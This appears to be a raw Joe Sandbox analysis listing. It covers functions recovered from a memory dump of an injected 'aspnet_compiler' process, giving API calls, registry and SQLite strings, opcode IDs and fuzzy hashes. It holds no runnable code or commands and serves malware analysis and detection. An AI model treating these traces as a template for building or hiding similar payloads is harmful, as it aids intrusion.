                                                                                                                                                                                                                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                                                                  • API String ID: 3473751417-2880344631
                                                                                                                                                                                                                                                                  • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                                                                                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                                                                                  • String ID: %2.2X
                                                                                                                                                                                                                                                                  • API String ID: 2521778956-791839006
                                                                                                                                                                                                                                                                  • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                                                                                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _snwprintfwcscpy
                                                                                                                                                                                                                                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                                                                                  • API String ID: 999028693-502967061
                                                                                                                                                                                                                                                                  • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                                                                                  • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy$memsetstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2350177629-0
                                                                                                                                                                                                                                                                  • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                                                                                  • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                                                  • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                                                                  • API String ID: 2221118986-1606337402
                                                                                                                                                                                                                                                                  • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                                                                                  • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 265355444-0
                                                                                                                                                                                                                                                                  • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                                                                                  • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                                                                  • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1973883786-0
                                                                                                                                                                                                                                                                  • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                                                                                                                                                                                                  • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                                                                  • API String ID: 2618321458-3614832568
                                                                                                                                                                                                                                                                  • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                                                                                  • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004185FC
                                                                                                                                                                                                                                                                  • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@AttributesFilememset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 776155459-0
                                                                                                                                                                                                                                                                  • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                                                                                                                                  • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                                                                                                  • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2308052813-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                                                                                                  • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                                                                                                                  • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: PathTemp$??3@
                                                                                                                                                                                                                                                                  • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                                                                                  • API String ID: 1589464350-1420421710
                                                                                                                                                                                                                                                                  • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                                                                                                  • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                                                                                                    • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                                                                  • API String ID: 1775345501-2769808009
                                                                                                                                                                                                                                                                  • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                                                                                  • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                                                                                                  • String ID: General
                                                                                                                                                                                                                                                                  • API String ID: 999786162-26480598
                                                                                                                                                                                                                                                                  • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                                                                                  • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                                                                  • String ID: Error$Error %d: %s
                                                                                                                                                                                                                                                                  • API String ID: 313946961-1552265934
                                                                                                                                                                                                                                                                  • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                                                                  • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                                                                                                  • API String ID: 0-1953309616
                                                                                                                                                                                                                                                                  • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                                                                  • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                                                                                                  • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                                                  • API String ID: 3510742995-272990098
                                                                                                                                                                                                                                                                  • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                                                                  • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                                                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2911713577-0
                                                                                                                                                                                                                                                                  • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                                                                                  • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
